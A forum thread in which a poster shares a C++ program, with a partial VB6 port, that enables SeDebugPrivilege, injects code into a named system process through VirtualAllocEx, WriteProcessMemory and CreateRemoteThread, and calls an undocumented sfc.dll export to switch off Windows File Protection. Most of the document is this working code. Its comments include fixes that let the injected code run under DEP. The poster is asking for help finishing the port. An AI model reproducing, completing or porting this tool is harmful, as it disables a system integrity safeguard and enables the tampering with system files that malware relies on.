
Thread: Memory API Help.......... (VirtualAllocEx, WriteProcessMemory, CreateRemoteThread)


    Memory API Help.......... (VirtualAllocEx, WriteProcessMemory, CreateRemoteThread)

    I am trying to convert some code from C++ to VB6 (the listing uses try/catch, so it is C++, not C), but the memory API functions really confuse me.


    Here is the code:

    Code:
    -----  dwfp2.cpp
    #define WIN32_LEAN_AND_MEAN
    #define STRICT
    
    #include <windows.h>
    #include <tlhelp32.h>
    #include <tchar.h>
    #include <stdio.h>
    #include <string.h>
    
    
    #pragma check_stack (off)
    DWORD exec_func(FARPROC SfcTerminateWatcherThread)
    {
       /* This is the routine whose machine code is copied into the target
        * process: inject_thread copies the bytes from exec_func up to
        * after_thread_func and starts a remote thread on the copy, passing the
        * pointer main resolved from sfc.dll ordinal 2 as the thread argument.
        * It must therefore be self-contained: its only outside reference is
        * that pointer. The surrounding #pragma check_stack (off) presumably
        * keeps the compiler from emitting a stack-probe call that would point
        * back into this image — confirm on the toolchain in use. Any edit here
        * changes the injected bytes; keep it free of calls, globals and
        * string literals. NOTE(review): declared without WINAPI although it is
        * used as a thread start routine; looks intentional/harmless for a
        * thread entry point — verify. */
       SfcTerminateWatcherThread();
       return 0;
    }
    /* Marker only, never called: its address marks the end of exec_func's
     * code (inject_thread takes after_thread_func - exec_func as the length),
     * so it has to stay directly after exec_func in this translation unit. */
    void after_thread_func(void)
    {
    }
    #pragma check_stack 
    
    
    int adjust_privileges(void);
    DWORD get_process_pid(char *);
    int inject_thread(DWORD, LPVOID);
    
    
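    int main(int argc, char *argv[])
    {
        /* Usage: dwfp2 <process image name>
         *
         * Resolves sfc.dll ordinal 2, enables SeDebugPrivilege, finds the
         * target PID by image name, then copies exec_func into that process
         * and runs it on a remote thread. Every step is fatal on failure and
         * is reported on stdout. Returns 0 on success, 1 on a usage error and
         * -1 on any other failure. */
        if(argc < 2){
            printf("%s [process name]\n", argv[0]);
            return 1;
        }

        /* Fix: the module handle was passed straight to GetProcAddress, so a
         * missing sfc.dll surfaced as GetProcAddress(NULL, 2) and was
         * reported as the wrong failure. Check LoadLibrary on its own. */
        HMODULE hSfc = LoadLibrary("sfc.dll");
        if(hSfc == NULL){
            printf("Error: LoadLibrary sfc.dll\n");
            return -1;
        }

        /* Lookup by ordinal, not by name. Ordinals are not a stable contract
         * between Windows releases, so verify on the target build that
         * ordinal 2 really is the export this program expects. */
        FARPROC pSTWT = GetProcAddress(hSfc, (LPCSTR)2);
        if(pSTWT == NULL){
            printf("Error: SfcTerminateWatcherThread\n");
            return -1;
        }

        int err = adjust_privileges();
        if(err != 0){
            printf("Error: adjust_privileges:%d\n", err);
            return -1;
        }

        DWORD dwPID = get_process_pid(argv[1]);
        if(dwPID == 0){
            printf("Error: get_process_pid\n");
            return -1;
        }

        err = inject_thread(dwPID, pSTWT);
        if(err != 0){
            printf("Error: inject_thread:%d\n", err);
            return -1;
        }

        printf("Windows File Protection Disabled.\n");
        return 0;
    }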
    
    
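    int adjust_privileges(void)
    {
        /* Enables SeDebugPrivilege on the current process token so that
         * OpenProcess(PROCESS_ALL_ACCESS) on a system process can succeed.
         *
         * Returns 0 on success, otherwise the failing step:
         *   1  OpenProcessToken failed
         *   2  LookupPrivilegeValue failed
         *   3  AdjustTokenPrivileges failed
         *   4  the token does not hold the privilege at all (see below) */
        int ret = 0;
        HANDLE hToken = NULL;

        try{
            if( ! OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken))
                throw 1;

            LUID luid;
            if( ! LookupPrivilegeValue(NULL, "SeDebugPrivilege", &luid))
                throw 2;

            TOKEN_PRIVILEGES tk_priv;
            tk_priv.PrivilegeCount = 1;
            tk_priv.Privileges[0].Luid = luid;
            tk_priv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

            if( ! AdjustTokenPrivileges(hToken, FALSE, &tk_priv, 0, NULL, NULL))
                throw 3;

            /* Fix: AdjustTokenPrivileges returns TRUE even when nothing was
             * enabled because the token never held the privilege (e.g. a
             * non-administrator caller); the only signal is GetLastError().
             * Without this check the program carried on and failed later in
             * OpenProcess with a far less useful error. */
            if(GetLastError() == ERROR_NOT_ALL_ASSIGNED)
                throw 4;

        }catch(int err){
            ret = err;
        }

        /* hToken is still NULL when OpenProcessToken failed. */
        if(hToken != NULL)
            CloseHandle(hToken);
        return ret;
    }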
    
    
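    DWORD get_process_pid(char *psname)
    {
        /* Looks up a process id by image file name using a Toolhelp snapshot.
         *
         * psname: image name to match, e.g. "winlogon.exe". The comparison is
         *         now case-insensitive, because Windows file names are; the
         *         original strcmp silently missed "WINLOGON.EXE".
         * Returns the PID of the LAST matching process enumerated (unchanged
         * from the original), or 0 when psname is NULL, the snapshot fails
         * or nothing matches.
         *
         * Security note: any process can be named like a system binary, so a
         * name match alone does not prove this is the genuine process; a
         * caller that cares should also check the image path, session or
         * parent rather than trust the name. */
        DWORD pid = 0;

        if(psname == NULL)
            return 0;

        HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
        if(hSnap == INVALID_HANDLE_VALUE)
            return 0;

        PROCESSENTRY32 pe;
        pe.dwSize = sizeof(pe);

        if(Process32First(hSnap, &pe)){
            do{
                if(_stricmp(pe.szExeFile, psname) == 0)
                    pid = pe.th32ProcessID;
            }while(Process32Next(hSnap, &pe));
        }

        CloseHandle(hSnap);
        return pid;
    }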
    
    
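    int inject_thread(DWORD dwPID, LPVOID pfunc)
    {
        /* Copies the machine code of exec_func into process dwPID and runs it
         * there on a new thread, passing pfunc as the thread argument.
         *
         * Returns 0 on success, otherwise the failing step:
         *   1  OpenProcess
         *   2  VirtualAllocEx
         *   3  WriteProcessMemory
         *   4  CreateRemoteThread
         *   5  the remote thread did not finish within 10 s (or the wait failed)
         *   6  VirtualProtectEx (new step, numbered last to keep 1-5 as before)
         *
         * Assumptions inherited from the original and NOT verified here:
         *  - exec_func and after_thread_func are laid out back to back in that
         *    order, so their pointer difference is exec_func's code length
         *    (incremental-link thunks break this — build with /INCREMENTAL:NO
         *    and check the difference is a sane size);
         *  - exec_func holds no absolute references (it only calls pfunc);
         *  - pfunc is valid at the same address inside the target, i.e. the
         *    module it points into is mapped at the same base there.
         *
         * Changes from the original:
         *  - the region is allocated PAGE_READWRITE, written, then switched to
         *    PAGE_EXECUTE_READ with VirtualProtectEx. The original executed a
         *    PAGE_READWRITE page, which DEP refuses, and the usual alternative
         *    (PAGE_EXECUTE_READWRITE) is a writable+executable region;
         *  - the process handle asks only for the rights these calls need
         *    instead of PROCESS_ALL_ACCESS (whose value also differs between
         *    SDK versions);
         *  - the remote memory is never freed while the thread may still be
         *    running in it (the original freed it on timeout, which can crash
         *    the target), and it is freed after a successful run (the original
         *    leaked it); the thread handle is closed on every path. */
        int ret = 0;

        HANDLE hProcess = NULL;
        HANDLE hThread = NULL;
        LPVOID remote_mem = NULL;
        BOOL thread_done = FALSE;
        DWORD old_prot = 0;
        SIZE_T code_len = (SIZE_T)((char *)after_thread_func - (char *)exec_func);

        try{
            hProcess = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION |
                PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ,
                FALSE, dwPID);
            if(hProcess == NULL)
                throw 1;

            remote_mem = VirtualAllocEx(hProcess, NULL, code_len,
                MEM_COMMIT, PAGE_READWRITE);
            if(remote_mem == NULL)
                throw 2;

            if( ! WriteProcessMemory(hProcess, remote_mem, (char *)exec_func,
                    code_len, NULL))
                throw 3;

            /* Make the copied code executable only after it has been written. */
            if( ! VirtualProtectEx(hProcess, remote_mem, code_len,
                    PAGE_EXECUTE_READ, &old_prot))
                throw 6;

            hThread = CreateRemoteThread(hProcess, NULL, 0,
                (LPTHREAD_START_ROUTINE)remote_mem, pfunc, 0, NULL);
            if(hThread == NULL)
                throw 4;

            /* Only WAIT_OBJECT_0 proves the thread has exited; WAIT_FAILED was
             * previously treated as success. */
            if(WaitForSingleObject(hThread, 10 * 1000) != WAIT_OBJECT_0)
                throw 5;
            thread_done = TRUE;

        }catch(int err){
            ret = err;
        }

        /* Release the remote region only when no thread was created in it or
         * the thread has provably finished. */
        if(remote_mem != NULL && (hThread == NULL || thread_done))
            VirtualFreeEx(hProcess, remote_mem, 0, MEM_RELEASE);
        if(hThread != NULL)
            CloseHandle(hThread);
        if(hProcess != NULL)
            CloseHandle(hProcess);
        return ret;
    }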
    -----


    Here is what I have so far:
    (I stopped at the VirtualAllocEx call because I am not sure what this size expression means: (SIZE_T)((char *)after_thread_func - (char *)exec_func). As far as I can tell it is the number of bytes between the two functions, but I do not know how to get that value in VB.)
    Code:
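    Public Sub InjectCode2()
        ' VB6 port of main()/inject_thread() from dwfp2.cpp: resolve sfc.dll
        ' ordinal 2, enable SeDebugPrivilege, open the target process and
        ' reserve memory in it for the injected routine.
        '
        ' hProcess and lPID are not declared here; they are assumed to be
        ' module-level variables. GetProcAddress2, EnableProcessPrivileges and
        ' SE_Debug are assumed to be declared elsewhere in the project.
        '
        ' About the C expression (SIZE_T)((char *)after_thread_func - (char *)exec_func):
        ' it is the byte length of exec_func's machine code — the address of the
        ' function that follows it minus its own address. It only works because
        ' the C compiler emitted the two functions back to back and exec_func
        ' references nothing outside itself. There is no direct VB6 equivalent
        ' (AddressOf on a VB procedure is unlikely to give self-contained,
        ' relocatable code — confirm), so the injected bytes and their length
        ' (lSize) have to come from somewhere else. This Sub still stops before
        ' that step, as the original did.
        '
        ' Changes from the original: each handle is checked before use, and the
        ' duplicated EnableProcessPrivileges call is made once.

        Dim pSFCModule As Long
        Dim pSTWT As Long       'SfcTerminateWatcherThread
        
        Dim pDataRemote As Long
        Dim lSize As Long
        
        'Get Handles:
        pSFCModule = LoadLibrary("sfc.dll")
        If pSFCModule = 0 Then
            MsgBox "LoadLibrary(sfc.dll) failed"
            Exit Sub
        End If
        'Ordinal 2 is not a stable contract across Windows versions; verify on
        'the target build that it is really SfcTerminateWatcherThread.
        pSTWT = GetProcAddress2(pSFCModule, 2)
            MsgBox pSTWT
        If pSTWT = 0 Then Exit Sub
            
        'Enable Debug privilege (once is enough)
        Call EnableProcessPrivileges(GetCurrentProcessId, SE_Debug)
        
        'Open Process:
        hProcess = OpenProcess(PROCESS_ALL_ACCESS, 0, lPID)
            MsgBox hProcess
        If hProcess = 0 Then Exit Sub
        
        'lSize is still 0 here, so this VirtualAllocEx cannot succeed until it
        'holds the length of the code to inject (see the note at the top).
        'PAGE_EXECUTE_READWRITE is what the C version should have used if the
        'page is executed directly (it asked for PAGE_READWRITE, which DEP
        'refuses to run); a tighter sequence is allocate read/write, write the
        'code, then VirtualProtectEx to PAGE_EXECUTE_READ.
        pDataRemote = VirtualAllocEx(hProcess, 0, lSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE)
        
    
    
    End Sub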


    Re: Memory API Help.......... (VirtualAllocEx, WriteProcessMemory, CreateRemoteThread)

    *Bump*



